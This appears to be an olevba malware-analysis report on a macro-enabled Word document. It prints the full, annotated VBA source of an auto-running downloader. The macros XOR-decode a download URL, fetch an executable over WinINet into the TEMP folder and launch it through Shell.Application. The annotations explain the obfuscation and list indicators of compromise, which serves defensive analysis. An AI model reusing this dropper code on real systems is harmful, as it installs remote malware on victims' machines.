- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- cihdel~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: cihdel~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Stage 0 (ThisDocument). Word runs AutoOpen by itself once the document is opened with macros
- ' enabled (see the AutoExec row in the ANALYSIS table below). It does nothing except jump to
- ' ZasimSimZa in module OIDL8; the real work is several hops deeper (OIDL8 -> IDL4 -> FILE6 -> A0007).
- Sub autoopen()
- ZasimSimZa
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO OIDL8.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/OIDL8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Stage 1 (OIDL8): pure indirection. CHEG = 34 is a decoy -- OLEOLEETOSLE in IDL4 never reads its
- ' parameter. The parentheses around the argument force a by-value copy, which changes nothing here.
- Sub ZasimSimZa()
- Dim CHEG As Integer
- CHEG = 34
- OLEOLEETOSLE (CHEG)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' WinINet imports under obfuscated names. Mapping taken from the Alias clauses:
- '   ETOKTOTUTPALIT4222 = InternetCloseHandle
- '   ETOKTOTUTPALIT422  = InternetOpenA     (session handle; the agent string comes from A0007)
- '   REKOMDED121        = InternetReadFile
- '   ETOKTOTUTPALIT4    = InternetOpenUrlA  (opens the decoded download URL, see IDL4.SomeFunct4)
- ' The VBA7/Win64 branch (PtrSafe, LongPtr) keeps the downloader working on 64-bit Office as well.
- ' NOTE(review): InternetCloseHandle is declared with the handle ByRef, but the Win32 prototype takes
- ' the HINTERNET by value; as declared, the close calls in A0007 pass the address of the handle
- ' variable, so the handles are probably never actually released. No effect on the download itself.
- ' InternetReadFile returns a 32-bit BOOL; declaring it As Integer keeps only the low 16 bits, which
- ' is harmless here because the caller discards the return value anyway.
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function ETOKTOTUTPALIT4222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function ETOKTOTUTPALIT422 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function REKOMDED121 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As LongPtr, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function ETOKTOTUTPALIT4 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function ETOKTOTUTPALIT4222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function ETOKTOTUTPALIT422 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function REKOMDED121 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As Long, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function ETOKTOTUTPALIT4 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- ' String decoder used for every obfuscated constant in IDL4 (COM ProgIDs, download URL, file name).
- ' KUKURUKUZUKU01 = XOR key (WREGLEYSPEAR12), KUKURUKUZUKU02 = hex ciphertext, two hex digits per
- ' output byte. Output byte i is (hex pair i) Xor Asc(key character ((i Mod Len(key)) + 1)), so the
- ' key stream starts at the key's SECOND character and wraps around. Returns the plaintext string.
- ' To reproduce offline, apply exactly that indexing to the hex pairs -- olevba's --decode option
- ' only exposes the raw hex bytes, not this XOR layer.
- Public Function ZIGRIGFIG9(KUKURUKUZUKU01 As String, KUKURUKUZUKU02 As String) As String
- Dim SEREBRAAA10 As Integer
- Dim SEREBRAAA101 As Integer
- Dim UTJJTTJ As Double
- ' Padding: UTJJTTJ only takes the values 1..3, so the End (which would abort the whole macro)
- ' never executes. Same pattern recurs in FILE6 and A0007.
- For UTJJTTJ = 1 To 3
- If UTJJTTJ = 32 Then End
- Next UTJJTTJ
- Dim SEREBRAAA1 As Long
- Dim SEREBRAAA1O As String
- ' One iteration per ciphertext byte (LEFUNCLE1 is just Len).
- For SEREBRAAA1 = 1 _
- To _
- ( _
- LEFUNCLE1 _
- (KUKURUKUZUKU02) _
- / 2)
- ' Ciphertext byte: hex pair at positions 2i-1, 2i parsed with Val("&H..").
- SEREBRAAA10 = Val("&H" & _
- (Mid$(KUKURUKUZUKU02, _
- (2 * SEREBRAAA1) - 1, 2)))
- ' Key byte: note the +1 after Mod, so i=1 picks key character 2.
- SEREBRAAA101 = Asc(Mid$(KUKURUKUZUKU01, _
- ((SEREBRAAA1 Mod Len(KUKURUKUZUKU01)) + 1), 1))
- SEREBRAAA1O = SEREBRAAA1O + Chr(SEREBRAAA10 Xor SEREBRAAA101)
- Next SEREBRAAA1
- ZIGRIGFIG9 = SEREBRAAA1O
- End Function
- ' Thin wrapper around Len, present only to hide the call from simple keyword scanning. Returns
- ' Integer, so it would overflow beyond 32767 characters -- irrelevant for the short constants it sees.
- Public Function LEFUNCLE1(ASASSAWWWWWWWW As String) As Integer
- LEFUNCLE1 = Len(ASASSAWWWWWWWW)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Obfuscated constants; each is decoded at runtime by PIDLE0.ZIGRIGFIG9 with WREGLEYSPEAR12 as key.
- ' Hand-decoded values (NOTE(review): re-run the XOR routine before relying on these as IOCs):
- '   WREGLEYSPEAR16 -> "Shell.Application"                    used in FILE6.Sub1 to launch the payload
- '   WREGLEYSPEAR15 -> "\stoiki86.exe"                        payload file name, appended to the TEMP folder
- '   WREGLEYSPEAR14 -> "http://www.tschoetz.de/122/091.exe"   download URL handed to InternetOpenUrlA
- '   WREGLEYSPEAR13 -> "Scripting.FileSystemObject"           used for temp-folder lookup / FileExists / DeleteFile
- '   WREGLEYSPEAR12 -> the XOR key itself, stored in clear
- Public Const WREGLEYSPEAR16 = "2A020E1E195A2A090219021604263D3B3B"
- Public Const WREGLEYSPEAR15 = "25191F1D1C1F0241445B0E0D00"
- Public Const WREGLEYSPEAR14 = "111E1F024F5B440E0502450116313C3B3021287C30377D63464B455B4B445A0E0117"
- Public Const WREGLEYSPEAR13 = "2A09191B05000217155B2D1C0937072D2621373F1B303837170D"
- Public Const WREGLEYSPEAR12 = "tyjkrutkyrukueRTTUURRTRRR"
- ' Returns SAAARD1.GetSpecialFolder(2). SAAARD1 is the FileSystemObject created in FILE6.Sub1, and
- ' FSO SpecialFolder value 2 is TemporaryFolder, so this is the user's TEMP directory -- the drop
- ' location for the payload. Returned As Object; the caller concatenates it straight into a path.
- Public Function ItsALOOOP2(ByRef SAAARD1 As Object) As Object
- Set ItsALOOOP2 = SAAARD1.GetSpecialFolder(2)
- End Function
- ' Stage 2 (IDL4): RUFRUFRUF is never read and the string literal is a decoy (ZERNOAA2 ignores it
- ' too). The only effect is the call into FILE6.ZERNOAA2, which in turn calls Sub1.
- Sub OLEOLEETOSLE(RUFRUFRUF As Long)
- ZERNOAA2 ("CA_LLS_AAAL_CSL_921_29")
- End Sub
- ' Opens the download URL on an existing WinINet session. HLOPUSHKA6 = session handle from
- ' InternetOpenA; RUKALICO87 (ByRef, out) receives the handle from InternetOpenUrlA, 0 on failure.
- ' Always returns True -- the caller (A0007.FERMERPIG76) has to test RUKALICO87 itself, and does.
- ' NOTE(review): etoeshekto2 is declared Private Const in module A0007 and this module has no
- ' Option Explicit, so here the name resolves to an implicit, uninitialised Variant (Empty -> 0):
- ' the dwFlags argument is effectively 0 rather than &H4000000, unless the listing omits a declaration.
- #If VBA7 _
- And Win64 Then
- Public Function SomeFunct4(ByRef RUKALICO87 As LongPtr, HLOPUSHKA6 As LongPtr) As Boolean
- #Else
- Public Function SomeFunct4(ByRef RUKALICO87 As Long, HLOPUSHKA6 As Long) As Boolean
- #End If
- Dim URLPURL1 As String
- ' Decode the URL only at call time so it never appears in clear in the document.
- URLPURL1 = ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR14)
- ' InternetOpenUrlA(hSession, url, lpszHeaders = NULL, dwHeadersLength = 0, dwFlags, dwContext = 0)
- RUKALICO87 _
- = ETOKTOTUTPALIT4 _
- ( _
- HLOPUSHKA6, _
- URLPURL1, vbNullString, _
- 0, _
- etoeshekto2, 0)
- SomeFunct4 = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Not referenced anywhere in this listing; decoy constant.
- Public Const FIRDISHANK21 = "HeXaRGUS"
- ' Stage 3 (FILE6): PIPKLIP5 is ignored and no return value is assigned; the function exists only
- ' to add one more hop before Sub1, which holds the actual dropper logic.
- Public _
- Function ZERNOAA2(PIPKLIP5 _
- As _
- String)
- Sub1
- End Function
- ' Stage 4 -- the dropper itself. Sequence:
- '   1. CreateObject("Scripting.FileSystemObject")           (WREGLEYSPEAR13 decoded)
- '   2. target = <TEMP folder> & "\stoiki86.exe"             (ItsALOOOP2 + WREGLEYSPEAR15 decoded)
- '   3. delete an existing copy of target, if any
- '   4. FERMERPIG76(target): fetch the URL in WREGLEYSPEAR14 over WinINet and write it to target
- '   5. CreateObject("Shell.Application").Open target         (WREGLEYSPEAR16 decoded) -> runs it
- ' The For loops that compare a counter with 31..34 are padding: the counters never reach those
- ' values (KLALAKKSKKNNCN0 and LOOO9371003942732 are never declared -> Empty; this module has no
- ' Option Explicit), so the End statements never execute. ASDFKJF, SSSS and SIRDORBORMOG are
- ' implicit Variants for the same reason. Nothing is returned.
- ' NOTE(review): the result of FERMERPIG76 is tested but the If body is empty, so .Open is attempted
- ' even when the download failed and no file was written.
- Public Function Sub1()
- Dim KIKIPORAD7392 As Object
- Set KIKIPORAD7392 = CreateObject _
- (ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR13))
- Dim FBRRWTEWT As Long
- For FBRRWTEWT = 0 To 1
- If KLALAKKSKKNNCN0 = 31 Then End
- Next FBRRWTEWT
- Dim ETOPART98 As Object
- ' TEMP folder via FSO.GetSpecialFolder(2).
- Set ETOPART98 = ItsALOOOP2(KIKIPORAD7392)
- Dim AVAVAASSS As Double
- For AVAVAASSS = 1 To 3
- If AVAVAASSS = 32 Then End
- Next AVAVAASSS
- Dim FEWQQ23
- ' Full drop path: <TEMP> & "\stoiki86.exe".
- ASDFKJF = ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR15)
- FEWQQ23 = ETOPART98 & ASDFKJF
- Dim VBEESFBSSB As Integer
- For VBEESFBSSB = 6 To 7
- If LOOO9371003942732 = 33 Then End
- Next VBEESFBSSB
- Dim NGTJT563 As Integer
- For NGTJT563 = 2 To 3
- If NGTJT563 = 34 Then End
- Next NGTJT563
- ' Remove a stale copy so the fresh download is what gets executed.
- If ItsALOOOP3(KIKIPORAD7392, FEWQQ23) Then
- KIKIPORAD7392. _
- DeleteFile FEWQQ23
- End If
- ' Download; return value is evaluated but ignored.
- If FERMERPIG76(FEWQQ23) Then
- End If
- ' No-op: SSSS was never set to anything.
- Set SSSS = Nothing
- ' Existence check whose result is also ignored.
- If ItsALOOOP3(KIKIPORAD7392, FEWQQ23) Then
- End If
- ' Execute the dropped file through Shell.Application.Open (the same as double-clicking it).
- Set SIRDORBORMOG = CreateObject _
- (ZIGRIGFIG9 _
- (WREGLEYSPEAR12, WREGLEYSPEAR16))
- SIRDORBORMOG.Open FEWQQ23
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL3.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/IDL3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' FileExists wrapper: HAARD6 is the FileSystemObject, ASXXX3 the path to test. Sub1 uses it once to
- ' decide whether to delete a stale payload and once more after the download (that result is unused).
- Public Function ItsALOOOP3(ByRef HAARD6 As Object, ByVal ASXXX3 As String) As Boolean
- If HAARD6.FileExists(ASXXX3) Then
- ItsALOOOP3 = True
- Else
- ItsALOOOP3 = False
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO A0007.bas
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/A0007'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Download module settings (the only module with Option Explicit).
- '   VIKAPIKA1872 = InternetReadFile chunk size in bytes (8162)
- '   VIKAPIKA1871 = "HAZ", passed as lpszAgent to InternetOpenA, i.e. the HTTP User-Agent -- a usable
- '                  network detection signature for this sample
- '   VIKAPIKA1999 = 1 = INTERNET_OPEN_TYPE_DIRECT (no proxy lookup)
- '   etoeshekto2  = &H4000000 = INTERNET_FLAG_DONT_CACHE
- ' NOTE(review): etoeshekto2 is Private, so the reference to it in IDL4.SomeFunct4 does not see this
- ' value (see that module).
- Option Explicit
- Private Const VIKAPIKA1872 = 8162
- Private Const VIKAPIKA1871 As String = "HAZ"
- Private Const VIKAPIKA1999 = 1
- Private Const etoeshekto2 = &H4000000
- ' Downloads the URL decoded in IDL4.SomeFunct4 and writes the bytes to AHESLIBIAHESLIBI (the TEMP
- ' payload path built in FILE6.Sub1). Returns True when at least one byte was received, else False.
- ' Flow: InternetOpenA("HAZ", DIRECT) -> InternetOpenUrlA -> InternetReadFile in 8162-byte chunks into
- ' a fixed-length buffer -> Open ... For Binary Access Write / Put (raw bytes, no length prefix) ->
- ' InternetCloseHandle on both handles.
- ' NOTE(review): the first chunk is copied as the whole fixed-length buffer (POKORO4E = REKOMDEDEBET1)
- ' rather than the CDSFDFD bytes actually read, so a first read shorter than 8162 bytes leaves
- ' buffer filler in the dropped file; only later chunks are trimmed with Mid. The output file is
- ' opened only after the whole response is in memory, and a failing Open would raise with both
- ' WinINet handles still open. FiGaMan is unused; the For loop (6..8 vs 38) is padding, End never runs.
- Public Function FERMERPIG76 _
- (ByVal AHESLIBIAHESLIBI As String) As Boolean
- #If VBA7 _
- And Win64 Then
- Dim THEP9RAM8 As LongPtr, K3AK4AY5AT6O9 As LongPtr
- #Else
- Dim THEP9RAM8 As Long, K3AK4AY5AT6O9 As Long
- #End If
- Dim CDSFDFD As Long
- ' REKOMDEDEBET1 is a fixed-length 8162-char string used as the raw read buffer.
- Dim REKOMDEDEBET1 As String * VIKAPIKA1872, POKORO4E As String
- Dim SISKAPIR721 As Integer, DLINIYPAREN As Double
- ' Session handle (THEP9RAM8); bail out silently if WinINet refuses.
- THEP9RAM8 = ETOKTOTUTPALIT422(VIKAPIKA1871, VIKAPIKA1999, vbNullString, vbNullString, 0)
- If THEP9RAM8 = 0 Then
- Exit Function
- End If
- Dim FiGaMan As Boolean
- ' URL handle comes back in K3AK4AY5AT6O9; SomeFunct4's own return value is always True.
- If SomeFunct4(K3AK4AY5AT6O9, THEP9RAM8) Then
- End If
- If K3AK4AY5AT6O9 = 0 Then
- DLINIYPAREN = 0
- Else
- ' First read: whole buffer copied regardless of CDSFDFD (see note above).
- REKOMDED121 K3AK4AY5AT6O9, REKOMDEDEBET1, VIKAPIKA1872, CDSFDFD
- POKORO4E = REKOMDEDEBET1
- ' Subsequent reads until InternetReadFile reports 0 bytes.
- Do While CDSFDFD <> 0
- REKOMDED121 K3AK4AY5AT6O9, REKOMDEDEBET1, VIKAPIKA1872, CDSFDFD
- Dim VSSDVZAAA As Long
- For VSSDVZAAA = 6 To 8
- If VSSDVZAAA = 38 Then End
- Next VSSDVZAAA
- POKORO4E = POKORO4E + Mid(REKOMDEDEBET1, 1, CDSFDFD)
- Loop
- ' Write the accumulated body to disk as raw bytes.
- DLINIYPAREN = Len(POKORO4E): SISKAPIR721 = FreeFile
- Open AHESLIBIAHESLIBI _
- For Binary Access Write _
- Lock Write _
- As #SISKAPIR721
- Put #SISKAPIR721, _
- , POKORO4E
- Dim HHHHHHHAAAAAAALLLLLLL As Double
- For HHHHHHHAAAAAAALLLLLLL = 2 To 3
- If HHHHHHHAAAAAAALLLLLLL = 37 Then End
- Next HHHHHHHAAAAAAALLLLLLL
- Close #SISKAPIR721
- End If
- ' Close URL handle then session handle (see the ByRef caveat on the Declare in PIDLE0).
- ETOKTOTUTPALIT4222 K3AK4AY5AT6O9
- ETOKTOTUTPALIT4222 THEP9RAM8
- POKORO4E = ""
- ' Success = something was received; DLINIYPAREN stays 0 when the URL could not be opened.
- If DLINIYPAREN Then
- FERMERPIG76 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO UserForm2.frm
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO UserForm3.frm
- in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)